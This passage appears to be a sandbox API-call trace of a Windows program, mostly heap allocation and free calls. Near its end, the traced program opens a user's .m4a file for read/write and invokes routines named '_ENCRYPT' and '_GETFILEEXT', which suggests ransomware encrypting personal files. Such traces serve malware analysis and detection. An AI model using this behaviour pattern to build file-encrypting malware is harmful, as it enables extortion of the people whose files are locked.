lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.053] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.054] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.057] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.059] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889c10 [0038.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889c10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.059] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\svumdbh5swjrewp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.059] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.059] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.059] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.059] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0038.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8896b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.060] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.060] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.060] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.060] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.060] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.060] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.060] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.061] 